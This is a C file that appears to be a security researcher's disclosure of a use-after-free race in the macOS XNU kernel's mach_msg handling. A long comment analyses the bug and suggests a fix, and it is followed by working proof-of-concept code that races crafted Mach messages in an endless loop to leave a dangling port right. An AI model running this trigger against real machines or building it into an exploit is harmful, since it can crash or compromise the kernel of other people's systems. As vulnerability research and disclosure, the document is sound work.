#if 0
ianbeer

XNU kernel use-after-free in mach_msg

When auditing code I'm always on the lookup for functions with strange
or unexpected semantics; for example obscure and rare failure cases. ipc_port_copy_send
is just such a function. To be fair, its behaviour is documented (correctly)
quite clearly in a comment right above the method:

  /*
   *	Routine:	ipc_port_copy_send
   *	Purpose:
   *		Make a naked send right from another naked send right.
   *			IP_NULL		-> IP_NULL
   *			IP_DEAD		-> IP_DEAD
   *			dead port	-> IP_DEAD
   *			live port	-> port + ref
   *	Conditions:
   *		Nothing locked except possibly a space.
   */

  ipc_port_t
  ipc_port_copy_send(
    ipc_port_t      port)
  {
    ipc_port_t sright;

    if (!IP_VALID(port)) {
      return port;
    }

    ip_lock(port);
    if (ip_active(port)) {
      ipc_port_copy_send_locked(port);
      sright = port;
    } else {
      sright = IP_DEAD;
    }
    ip_unlock(port);

    return sright;
  }


When passed IP_NULL as a port (all zeros) you get IP_NULL back.
When passed IP_DEAD as a port (all ones) you get IP_DEAD back.
When passed a dead port you get IP_DEAD back.
When passed a live port, you get back a port and a reference.

That's all fine; but to correctly *use* a function like that you need to be able
to answer questions like: what's the difference between passing a dead port
and passing IP_DEAD? When might you ever encounter such situations? That takes quite
a deep level of understanding.

A different, useful, but wrong, way to look at this method is as one which just gives
you (in the kernel) another send right for a send right you already have.

And if you look at it like that, then perhaps you might think that it's just
a convenient way to take a reference *and* bump up the ip_srights field of a port.

And of course, it *does* do that - that's exactly what ipc_port_copy_send_locked does.

But you need to be very careful to not use it to just bump up a reference count...

What I mean by that is that ipc_port_copy_send *won't* actually bump up the reference
count if it's passed a dead port pointer; that's exactly what this is checking:
    
    if (ip_active(port)) {
      ipc_port_copy_send_locked(port);
      sright = port;
    } else {
      sright = IP_DEAD;
    }

A dead port is one where the receive right has been destroyed and thus no messages can
ever be received. There's an important difference between a dead port *pointer* and the
sentinel value IP_DEAD; a dead port pointer is still, well, a pointer to an
ipc_port structure. That pointer holds a reference to that port or is being
used under the port's lock. Pointers which previously represented send rights become
pointers representing dead names once that port has been "destroyed".

It's important to emphasize that destroyed here speaks strictly about the 
receive *right* being destroyed, not the port itself being deallocated or freed. The
ipc_port structure is still reference counted and will only be free'd once all references
are dropped.

Destroying a receive right clears the IP_BITS_ACTIVE bit in the ipc_port, and that's what 
the ip_active(port) above is checking.

So what does this mean in practice? It means that you have to use ipc_port_copy_send
as it is meant to be used and you *must* respect the return value. If you passed in
what you thought was a port send right and you got back IP_DEAD then the receive
right for that port has been destroyed. And crucially, no extra reference was taken
on that port.

Lets look at an example callsite where this isn't the case. This code is in
ipc_right_copyin_two; a very low-level piece of the code used to implement the sending
of mach messages. Comment is verbatim from the source:

		kr = ipc_right_copyin(space, name, entry,
		    msgt_name, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
		    objectp, sorightp, releasep,
		    &assertcnt, 0, NULL);

		assert(assertcnt == 0);
		if (kr != KERN_SUCCESS) {
			return kr;
		}

		/*
		 *	Copy the right we got back.  If it is dead now,
		 *	that's OK.  Neither right will be usable to send
		 *	a message anyway.
		 */
		(void)ipc_port_copy_send(ip_object_to_port(*objectp));

ipc_right_copyin is the low-level method used to actually transfer a mach port right
from a source space into the kernel. It takes the name of a port, a space, that name's
entry in that space, a disposition (how to extract the right from the space) and returns
an ipc_object pointer (via the objectp out-ptr). In this case, if msgt_name (the disposition) is 
MACH_MSG_TYPE_COPY_SEND, objectp will be set to point to the ipc_port named by name as long
as that port is still active. objectp will hold a reference to that port.

If that suceededs then then they do this:

		/*
		 *	Copy the right we got back.  If it is dead now,
		 *	that's OK.  Neither right will be usable to send
		 *	a message anyway.
		 */
		(void)ipc_port_copy_send(ip_object_to_port(*objectp));

Note that the port pointed to by *objectp is the same they just looked up and as the
comment makes pretty clear the programmer's intention here is to
"Copy the right we got back". As discussed earlier, that's something which
ipc_port_copy_send doesn't actually guarantee to do.

The crux of the issue is that they ignore the return value there and simply assume that
they successfully acquired another send right to *objectp. But if you're very very
particular about the message you send you can make ipc_port_copy_send fail to take that
extra reference. But to see how to do that we need to first look at exactly what this
code is even trying to do and then figure out how to set stuff up to try to hit the
failure case.

*** So nice they copied it twice - the curious case of the copyin_two ***

What is this weird code even trying to achieve?

Like most of the MACH code (at least the port stuff, lets not think about VM...)
ipc_port_copyin_two has a nice comment explaining its intended purpose as
well as pre- and post-condition:

  /*
   *	Routine:	ipc_right_copyin_two
   *	Purpose:
   *		Like ipc_right_copyin with two dispositions,
   *		each of which results in a send or send-once right,
   *		and deadok = FALSE.
   *	Conditions:
   *		The space is write-locked and active.
   *		The object is returned with two refs/rights.
   *		Msgt_one refers to the dest_type
   *	Returns:
   *		KERN_SUCCESS		Acquired an object.
   *		KERN_INVALID_RIGHT	Name doesn't denote correct right(s).
   *		KERN_INVALID_CAPABILITY	Name doesn't denote correct right for msgt_two.
   */

It's a special wrapper around ipc_right_copyin for the (obscure) case when you
want to copyin *two* rights both with the same name from a space but aren't satisfied
with just trying to copy them in one after the other.

The only two callsites are in ipc_kmsg_copyin_header which is responsible for 
copying in the port rights contained in a mach_msg_header_t which is being sent.

ipc_kmsg_copyin_header discusses the reasons for using ipc_right_copyin_two
but doesn't really explain exactly why it's required:

   *	Routine:	ipc_kmsg_copyin_header
   *	Purpose:
   *		"Copy-in" port rights in the header of a message.
   *		Operates atomically; if it doesn't succeed the
   *		message header and the space are left untouched.
   *		If it does succeed the remote/local port fields
   *		contain object pointers instead of port names,
   *		and the bits field is updated.  The destination port
   *		will be a valid port pointer.

ipc_copyin_two is called when either the message destination name and voucher name match
or the destination name and reply name match. In both cases they can have matching or
different dispositions. We'll ignore the voucher case for now as it adds another layer
of complexity and instead look at the case of sending a mach message where the
destination and reply ports have the same name.

That means that the msgh_remote_port and msgh_local_port names are the same.

(One could consider whether that ever actually makes sense, but that's a different
question; it's definitely supported and possible.)

In order to reach the target ipc_port_copy_send in ipc_right_copyin_two we also need to
ensure that the dispositions of the destination and reply ports are either 
both MACH_MSG_COPY_SEND or one is MACH_MSG_COPY_SEND and the other is MACH_MSG_MOVE_SEND.

Sending a mach message header like this will reach the ipc_port_copy_send call:

    // dest and reply must name the same port:
    msg->hdr.msgh_remote_port = target_port;
    msg->hdr.msgh_local_port = target_port;

    // they must both use COPY_SEND disposition:
    msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_COPY_SEND, // remote
      MACH_MSG_TYPE_COPY_SEND, // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other

The second part of the puzzle is this:

We need ipc_right_copyin of a COPY_SEND or MOVE_SEND right to succeed and that requires
the port named by that right to still be active (otherwise we'd get a dead name back.)

We then need that port to become inactive such that we hit the error path in
ipc_port_copy_send and the second reference isn't taken.

And we need that transition from active to dead to happen *while* the space lock is held,
as the space lock is held throughout ipc_kmsg_copyin_header.

One approach would be to target a receive right which is held by a different space
but whose lifetime we can influence in some way - this might work but it adds the requirement
that we need to be able to interact with other spaces and ideally we can figure
out a way to do this while requiring no resources which could be potentially sandboxed off.

There are some quirks we can use to our advantage though to get a suitable level of control
over the destruction of a receive right 

*** the self-destructing receive ***

You can move receive rights in mach messages. When you send such a message, the receive right
is extracted from the sender's space and enters limbo - it's not dead, just right now
nobody can receive any messages on that port. Crucially though messages can still be enqueued
on that port even though the port's ip_receiver field is NULL (as it's not currently in any
space.)

The copyin of a mach message header holds the space lock throughout but it's then dropped
to copy in the message body; each right to be copied in has to first grab the lock, do the
lookup of the name then drop the lock.

There are a multitude of ways in which sending a mach message can fail. If a message send
fails because the destination port message queue is full for example then the kernel attempts
to "re-inject" the sent message into the sender's space. But if the copyins of the rights
in the message body themselves fail then the kernel *destroys* those rights, rather than
attempting to re-inject them back for userspace to deal with.

We can use this to craft a self-destructing receive right which can move from active to dead
while the space from which it originated is locked.

We use a mach message with two port descriptors. The first uses a MOVE_RECEIVE disposition
to move the target receive right into limbo. The second descriptor names an invalid right and when 
its copyin fails will cause the in-limbo receive right to be destroyed, setting
IP_BITS_ACTIVE.

All that's then required is to repeatidly construct and send these two messages approximately in parallel
and wait for the scheduler to co-operate such that the receive right dies on one thread
right in between the calls to ipc_right_copyin and ipc_port_copy_send on the other.

Once that happens the kernel believes it holds two send rights for a port for which it in fact
only has one, and bad stuff happens.

*** fixing it ***

A relatively trivial fix would be to just check that the return value of ipc_port_copy_send
matches *objectp; if they're different then something bad has happened.

There is at least one other callsite and ipc_port_make_send potentially has a similar issue.

build: clang -o portal21 portal21.c -O2 -Wall
run: ./portal21

tested on MacOS 11.6 (20G165) on Intel
#endif

#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <pthread.h>

#define require(expr) \
do { \
  if (!(expr)) { \
    printf("fail %d\n", __LINE__); \
    exit(EXIT_FAILURE); \
  } \
} while(0)

void log_err(kern_return_t err) {
    printf("err: 0x%x - %s\n", err, mach_error_string(err));
}

mach_port_t rp(void) {
    kern_return_t err;
    mach_port_t name = MACH_PORT_NULL;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name);
    require(err == KERN_SUCCESS);
    
    return name;
}

struct trigger_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    uint32_t invalid_desc;
};

void build_trigger_message(struct trigger_msg* msg, mach_port_t target_port) {
    memset(msg, 0, sizeof(struct trigger_msg));

    // dest and reply must name the same port:
    msg->hdr.msgh_remote_port = target_port;
    msg->hdr.msgh_local_port = target_port;

    // they must both use COPY_SEND disposition:
    msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_COPY_SEND, // remote
      MACH_MSG_TYPE_COPY_SEND, // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other

    // claim we have a single descriptor, but we're really too small
    // this will cause ipc_kmsg_copy_body to clean the kmsg

    msg->body.msgh_descriptor_count = 1;
    msg->invalid_desc = 0;

    msg->hdr.msgh_size = sizeof(struct trigger_msg);
}

/*
 * We need a port for which we hold a send right to move from active to inactive
 * while our space is locked. We can do that by getting it destructed while in-limbo.
 * Note that an in-limbo MOVE_RECEIVE can still receive.
 * The in-limbo destruction needs to happen between the target ipc_right_copyin
 * and the ipc_port_copy_send; this is the race window.
 */

struct inactivate_in_limbo_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_port_descriptor_t port_desc;
    mach_msg_port_descriptor_t invalid_desc;
};

void build_inactivate_in_limbo_msg(struct inactivate_in_limbo_msg* msg, mach_port_t send_to_limbo) {
    mach_port_t dst = rp();

    memset(msg, 0, sizeof(struct inactivate_in_limbo_msg));
    
    msg->hdr.msgh_remote_port = dst;

    msg->hdr.msgh_bits = MACH_MSGH_BITS_SET(
      MACH_MSG_TYPE_MAKE_SEND, // remote
      0,                       // local
      0,                       // voucher
      MACH_MSGH_BITS_COMPLEX); // other

    msg->body.msgh_descriptor_count = 2;

    // the first descriptor is valid:
    msg->port_desc.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->port_desc.name = send_to_limbo;
    msg->port_desc.disposition = MACH_MSG_TYPE_MOVE_RECEIVE;

    // an invalid descriptor to cause the destruction of the receive right but without the space being locked
    // (as by this point the receive right isn't in our space)

    msg->invalid_desc.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->invalid_desc.name = 0xffff;
    msg->invalid_desc.disposition = MACH_MSG_TYPE_MOVE_RECEIVE;

    msg->hdr.msgh_size = sizeof(struct inactivate_in_limbo_msg);
}

// TODO: use a lock for the synchronization; for now this is fine on my intel macbook test setup
mach_msg_header_t* thread_msg = NULL;
volatile int thread_should_send = 0;
volatile int thread_has_sent = 0;

void* multi_trigger_thread(void* arg) {
    kern_return_t err;

    while(1) {
        while(!thread_should_send) {;}
        err = mach_msg_send(thread_msg);
        //log_err(err);
        thread_should_send = 0;
        thread_has_sent = 1;
    }


    return NULL;
}

int have_thread = 0;
pthread_t mt;

void send_in_parallel(mach_msg_header_t* msg_a, mach_msg_header_t* msg_b) {
    kern_return_t err;

    if (!have_thread) {
        pthread_create(&mt, NULL, multi_trigger_thread, NULL);
        have_thread = 1;
    }

    thread_msg = msg_b;
    thread_should_send = 1;

    err = mach_msg_send(msg_a);
    while(!thread_has_sent) {;}
    thread_has_sent = 0;
}

void trigger() {
    kern_return_t err;

    mach_port_t target_port = rp();

    // need a send right for COPY_SEND to succeed
    err = mach_port_insert_right(mach_task_self(), target_port, target_port, MACH_MSG_TYPE_MAKE_SEND);
    require(err == KERN_SUCCESS);

    struct trigger_msg trigger_msg = {};
    build_trigger_message(&trigger_msg, target_port);

    struct inactivate_in_limbo_msg limbo_msg = {};
    build_inactivate_in_limbo_msg(&limbo_msg, target_port);

    // send them in "parallel" and hope the timing works out...
    send_in_parallel(&trigger_msg.hdr, &limbo_msg.hdr);

    // if that worked, target_port should be a dangling send right:
    mach_port_deallocate(mach_task_self(), target_port);

    // otherwise, clean up:
    mach_port_destroy(mach_task_self(), limbo_msg.hdr.msgh_remote_port);
    mach_port_destroy(mach_task_self(), target_port);
}

int main(int argc, char** argv) {
    while(1) {
        trigger();
    }
    return 0;
}

